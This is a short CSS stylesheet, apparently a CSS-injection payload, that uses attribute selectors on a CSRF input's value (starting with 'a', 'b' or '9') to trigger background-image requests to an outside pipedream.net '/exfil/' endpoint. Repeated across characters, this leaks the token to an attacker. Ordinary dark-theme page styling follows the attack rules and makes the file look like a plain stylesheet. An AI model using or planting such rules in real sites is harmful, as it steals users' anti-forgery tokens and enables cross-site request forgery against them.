input.csrf[value^=a]{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/exfil/a);
}
html, body, input[name=csrf][value^=b]{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/exfil/b);
}

input.csrf[name=csrf][value^=9]{
    background-image: url(https://ent28xtybmafr.x.pipedream.net/exfil/9);   
}
html, body {
	width: 100%;
	margin: 0;
	padding: 0;
	color: #eeeeee;
	background: #232323;
}
